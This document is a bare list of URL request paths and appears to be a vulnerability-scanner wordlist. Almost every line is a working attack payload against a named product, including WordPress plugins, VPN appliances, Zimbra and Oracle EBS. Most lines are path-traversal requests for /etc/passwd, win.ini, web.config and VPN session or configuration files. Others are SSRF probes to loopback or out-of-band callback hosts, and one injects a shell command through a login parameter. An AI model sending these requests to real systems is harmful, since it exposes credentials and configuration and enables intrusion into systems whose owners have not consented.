/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
/cgi-bin/logoff.cgi
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/../../etc/passwd
/filemanager/upload.php
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/blast/nph-viewgif.cgi?../../../../etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
/wp-content/plugins/wp-payeezy-pay/donate.php
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/vpn/../vpns/cfg/smb.conf
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/index.php?page=/etc/passwd%00
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/wp1/home-18/?qtproxycall=https://oast.me
/?url=http://0177.0.0.1/server-status
/?host=http://0177.0.0.1/server-status
/?file=http://0177.0.0.1/etc/passwd
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.
/SAAS/t/_/;/WEB-INF/web.xml
/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd
/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==
/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd
/?lang=../../thinkphp/base
/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug
/fp-content/
/flatpress/fp-content/
/?q=./gibbon.sql
/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/api/geojson?url=file:/etc/passwd
/api/geojson?url=file:///etc/passwd
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/apply.cgi
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/msa/../../../../../../../../etc/passwd
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/(download)/etc/passwd
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
/wp1/home-18/?qtproxycall=https://{{interactsh-url}}
/?filename=../../../../../../etc/passwd&mphb_action=download
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/login.rst
/assets/../package.json
/api/admin/user/{{user_id}}
/api/system/pfp/{{user_id}}
/index/ajax/lang?lang=..//..//application/database
/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd
/w_selfservice/oauthservlet/%2e./.%2e/DownLoadCourseware?url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini
/HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config
/HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config
/HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config
/HM/M_Main/InformationManage/PlanDownLoad.aspx?PlanFile=../web.config
/HM/M_Main/InformationManage/ParkingFeelFileDownLoad.aspx?ParkingFile=../web.config
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
/login
/js/..%2f%2f/wizard.htm
/images/..%2f%2f/wizard.htm
/tmp/temp.db%3f.1.1.1.1a-1.css
/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
/i18n/component/JS?locale=en-US
/api/v1/version
